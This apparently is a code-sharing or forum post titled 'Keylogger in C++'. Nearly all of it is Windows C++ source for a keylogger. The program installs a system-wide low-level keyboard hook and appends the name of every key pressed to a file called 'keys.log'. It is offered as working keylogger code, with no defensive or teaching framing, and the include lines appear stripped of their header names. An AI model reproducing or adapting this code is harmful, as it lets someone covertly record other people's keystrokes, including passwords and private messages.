Search

Keylogger in C++

//Keylogger in C++
// This code will only work if you have Windows NT or 
    // any later version installed, 2k and XP will work. 
     
     
    #define _WIN32_WINNT 0x0400 
     
    #include  
    #include  
    #include  
     
    // Global Hook handle 
    HHOOK hKeyHook; 
     
     
     
    // This is the function that is "exported" from the 
    // execuatable like any function is exported from a 
    // DLL. It is the hook handler routine for low level 
    // keyboard events. 
     
    __declspec(dllexport) LRESULT CALLBACK KeyEvent ( 
     
      int nCode,   // The hook code 
      WPARAM wParam,  // The window message (WM_KEYUP, WM_KEYDOWN, etc.) 
      LPARAM lParam  // A pointer to a struct with information about the pressed key 
     
    ) { 
     if  ((nCode == HC_ACTION) &&   // HC_ACTION means we may process this event 
     ((wParam == WM_SYSKEYDOWN) ||  // Only react if either a system key ... 
     (wParam == WM_KEYDOWN)))   // ... or a normal key have been pressed. 
     { 
     
     //  This struct contains various information about 
     //  the pressed key such as hardware scan code, virtual 
     //  key code and further flags. 
     
     KBDLLHOOKSTRUCT hooked = 
     *((KBDLLHOOKSTRUCT*)lParam); 
     
     
     //  dwMsg shall contain the information that would be stored 
     //  in the usual lParam argument of a WM_KEYDOWN message. 
     //  All information like hardware scan code and other flags 
     //  are stored within one double word at different bit offsets. 
     //  Refer to MSDN for further information: 
     // 
     //  http://msdn.microsof...us/winui/winui/ 
     // windowsuserinterface/userinput/keyboardinput/aboutkeyboardinput.asp 
     // 
     //  (Keystroke Messages) 
     
     
     DWORD dwMsg = 1; 
     dwMsg += hooked.scanCode << 16; 
     dwMsg += hooked.flags << 24; 
     
     
     //  Call the GetKeyNameText() function to get the language-dependant 
     //  name of the pressed key. This function should return the name 
     //  of the pressed key in your language, aka the language used on 
     //  the system. 
     
     char lpszName[0x100] = {0}; 
     lpszName[0] = '['; 
     
     int i = GetKeyNameText(dwMsg, 
     (lpszName+1),0xFF) + 1; 
     
     lpszName[i] = ']'; 
     
     
     //  Print this name to the standard console output device. 
     
     FILE *file; 
     file=fopen("keys.log","a+"); 
     fputs(lpszName,file); 
     fflush(file); 
     } 
     
     
    //  the return value of the CallNextHookEx routine is always 
    //  returned by your HookProc routine. This allows other 
    //  applications to install and handle the same hook as well. 
     
     return CallNextHookEx(hKeyHook, 
     nCode,wParam,lParam); 
     
    } 
     
     
     
    // This is a simple message loop that will be used 
    // to block while we are logging keys. It does not 
    // perform any real task ... 
     
    void MsgLoop() 
    { 
     MSG message; 
     while (GetMessage(&message,NULL,0,0)) { 
     TranslateMessage( &message ); 
     DispatchMessage( &message ); 
     } 
    } 
     
     
    // This thread is started by the main routine to install 
    // the low level keyboard hook and start the message loop 
    // to loop forever while waiting for keyboard events. 
     
    DWORD WINAPI KeyLogger(LPVOID lpParameter) 
    { 
     
    //  Get a module handle to our own executable. Usually, 
    //  the return value of GetModuleHandle(NULL) should be 
    //  a valid handle to the current application instance, 
    //  but if it fails we will also try to actually load 
    //  ourself as a library. The thread's parameter is the 
    //  first command line argument which is the path to our 
    //  executable. 
     
     HINSTANCE hExe = GetModuleHandle(NULL); 
     if (!hExe) hExe = LoadLibrary((LPCSTR) lpParameter); 
     
    //  Everything failed, we can't install the hook ... this 
    //  never happened, but error handling is important. 
     
     if (!hExe) return 1; 
     
     
     
     hKeyHook = SetWindowsHookEx (  // install the hook: 
     
     WH_KEYBOARD_LL, // as a low level keyboard hook 
     (HOOKPROC) KeyEvent,   // with the KeyEvent function from this executable 
     hExe,   // and the module handle to our own executable 
     NULL   // and finally, the hook should monitor all threads. 
     ); 
     
     
    //  Loop forever in a message loop and if the loop 
    //  stops some time, unhook the hook. I could have 
    //  added a signal handler for ctrl-c that unhooks 
    //  the hook once the application is terminated by 
    //  the user, but I was too lazy. 
     
     MsgLoop(); 
     UnhookWindowsHookEx(hKeyHook); 
     return 0; 
    } 
     
     
    // The main function just starts the thread that 
    // installs the keyboard hook and waits until it 
    // terminates. 
     
    int main(int argc, char** argv) 
    { 
     HANDLE hThread; 
     DWORD dwThread; 
     DWORD exThread; 
     
     hThread = CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE) 
     KeyLogger, (LPVOID) argv[0], NULL, &dwThread); 
     
     if (hThread) { 
     return WaitForSingleObject(hThread,INFINITE); 
     } else { 
     return 1; 
     } 
    }